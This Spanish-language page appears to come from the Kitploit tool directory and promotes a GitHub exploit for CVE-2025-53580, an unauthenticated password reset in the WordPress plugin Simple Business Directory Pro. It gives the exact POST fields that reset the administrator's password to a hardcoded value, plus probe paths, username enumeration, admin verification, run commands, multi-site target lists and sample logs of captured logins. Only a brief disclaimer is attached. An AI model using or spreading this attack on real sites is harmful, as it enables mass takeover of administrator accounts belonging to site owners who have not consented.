Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-53580 — WordPress Simple Business Directory Pro Plugin < 15.6.9 es vulnerable a una escalada de privilegios de alta prioridad. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-53580
Escalada de PrivilegiosReconocimientoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-53580

CVE-2025-53580

WordPress Simple Business Directory Pro Plugin < 15.6.9 es vulnerable a una escalada de privilegios de alta prioridad.

4hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2025-53580

El plugin WordPress Simple Business Directory Pro < 15.6.9 es vulnerable a una Escalada de Privilegios de alta prioridad

CVE-2025-53580

Simple Business Directory Pro — Asignación incorrecta de privilegios → Restablecimiento de contraseña → Toma de control del administrador

root@kitploit:~
   ___  _        ___     __  __  __  ____     ____ ___  ____ __   __
  / (_)(_|   |_// (_)   /  )/  \/  )|        |    /   \|    /  \ /  \
 |       |   |  \__       /|    | / |___     |___   __/|___ \__/|    |
 |       |   |  /   -----/ |    |/      \-----   \    \    \/  \|    |
  \___/   \_/   \___/   /___\__//___\___/    \___/\___/\___/\__/ \__/

CVE Plugin Auth Python Author


❶ Vulnerabilidad

Causa raíz:
El plugin expone un formulario frontend de restauración de contraseña (qcpd-restore-pwd) que acepta un qcpd-uid numérico (ID de usuario de WordPress) y un nuevo valor pass. No se exige autenticación, token, nonce ni verificación por correo electrónico antes de cambiar la contraseña. Cualquier atacante no autenticado puede restablecer la contraseña del ID de usuario 1 (típicamente el administrador del sitio) y de cualquier otro usuario enviando una única solicitud POST, luego autenticarse con la contraseña inyectada para obtener acceso completo de administrador.


❷ Flujo del ataque

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  1. Discover SBD restore page                                   │
│     Probe 24 candidate paths  →  match body containing "sbd"   │
│                                                                 │
│  2. Reset passwords by user ID                                  │
│     POST <restore_url>                                          │
│       qcpd-restore-pwd      = restore                           │
│       qcpd-restore-pwd-type = user                              │
│       qcpd-uid              = 1  (then 2, then 3)              │
│       pass                  = NxploitedNX                       │
│                                                                 │
│  3. Enumerate usernames                                         │
│     /?author=1..9   →  redirect / body parse                    │
│     /wp-json/wp/v2/users  →  slug / username fields            │
│     hostname heuristic  +  "admin" fallback                     │
│                                                                 │
│  4. Login with injected password                                │
│     POST /wp-login.php  log=<user>  pwd=NxploitedNX             │
│     Check: wordpress_logged_in cookie present                   │
│                                                                 │
│  5. Verify admin access (dual method)                           │
│     GET /wp-json/wp/v2/users/me  →  capabilities.manage_options│
│     GET /wp-admin/users.php      →  adminmenu / users table     │
│                                                                 │
│  6. Write confirmed hit → Nx_sbd_login_hits.txt                 │
└─────────────────────────────────────────────────────────────────┘

❸ Configuración

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-53580.git
cd CVE-2025-53580
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

❹ Uso

root@kitploit:~
python3 CVE-2025-53580.py

Solicitudes

root@kitploit:~
Archivo de lista de objetivos (un host/URL por línea) [list.txt]:   list.txt
Hilos (sitios concurrentes) [3]:                         5
Tiempo de espera HTTP (segundos) [10]:                            10
Archivo de aciertos exitosos [Nx_sbd_login_hits.txt]:           Nx_sbd_login_hits.txt

La contraseña inyectada para todos los intentos de restablecimiento está fijada internamente:

root@kitploit:~
NxploitedNX

IDs de usuario atacados por sitio: 1, 2, 3 (configurable mediante MAX_USER_ID)


❺ Formato de objetivos — list.txt

root@kitploit:~
https://target1.com
target2.com
http://target3.com

❻ Páginas SBD candidatas examinadas

La herramienta escanea 24 rutas por objetivo buscando una página cuyo cuerpo contenga sbd:

root@kitploit:~
/login          /log-in         /signin         /sign-in
/user-login     /account/login  /restore        /password-reset
/reset-password /lost-password  /lostpassword   /user/restore
/my-account     /members/login  /member-login   /customer-login
/wp-login.php   /blog/login     /auth/login     /auth/restore
/sbd-login      /sbd-restore    /blog/log-in    /account/log-in

❼ Enumeración de nombres de usuario


❽ Verificación de administrador — Método dual

Cada inicio de sesión exitoso se verifica mediante dos comprobaciones independientes antes de escribirse en el disco:

Método 1 — API REST:

root@kitploit:~
GET /wp-json/wp/v2/users/me
→ capabilities.manage_options = true  →  ADMIN CONFIRMADO

Método 2 — Panel de control:

root@kitploit:~
GET /wp-admin/users.php
→ adminmenu / marcadores de tabla de usuarios presentes  →  ADMIN CONFIRMADO

❾ Archivo de salida

Nx_sbd_login_hits.txt

root@kitploit:~
[2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin
- login=/wp-login.php user=admin pass=NxploitedNX
- detail=ADMIN_CONFIRMED_REST(manage_options)

[2025-06-01 14:23:05] https://target2.com - type=USER - user=editor
- login=/wp-login.php user=editor pass=NxploitedNX
- detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers)

❿ Ejemplo de salida en terminal

root@kitploit:~
[info]  https://target.com :: starting
[ok]    https://target.com :: found front-end sbd page at https://target.com/my-account
[info]  https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX
[info]  https://target.com :: POST uid=1 → status=302, Location=/my-account/?restored=1
[info]  https://target.com :: POST uid=2 → status=302, Location=/my-account/?restored=1
[info]  https://target.com :: extracting usernames and trying login
[ok]    https://target.com :: login OK for user='admin', checking admin...
[ok]    https://target.com :: HIT for user='admin' → admin=True,
        detail=ADMIN_CONFIRMED_REST(manage_options)

[warn]  https://target2.com :: no sbd page found in candidate restore paths, skipping

⓫ Autor

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


⓬ Aviso legal

root@kitploit:~
SOLO PARA INVESTIGACIÓN DE SEGURIDAD AUTORIZADA Y EDUCACIÓN.

El autor no asume ninguna responsabilidad por el uso contra sistemas
que el operador no posee o para los cuales no tenga permiso explícito por escrito.

El uso no autorizado viola la CFAA, la CMA y leyes equivalentes en todo el mundo.
Solo tú eres responsable de tus acciones.

© 2025 Nxploited · Simple Business Directory Pro < 15.6.9 · Corregido en 15.6.9

Descargar herramienta
CampoDetalle
CVECVE-2025-53580
Pluginquantumcloud Simple Business Directory Pro (simple-business-directory-pro)
AfectadoTodas las versiones < 15.6.9
AutenticaciónNo requerida
TipoAsignación incorrecta de privilegios → Restablecimiento de contraseña no autenticado
CWECWE-266 · Asignación incorrecta de privilegios
MétodoEndpoint
Redirección de autor/?author=1 → /?author=9
API REST/wp-json/wp/v2/users → slug + username
Heurística del hostnamePrimera etiqueta del dominio
Fallback hardcodeadoadmin siempre incluido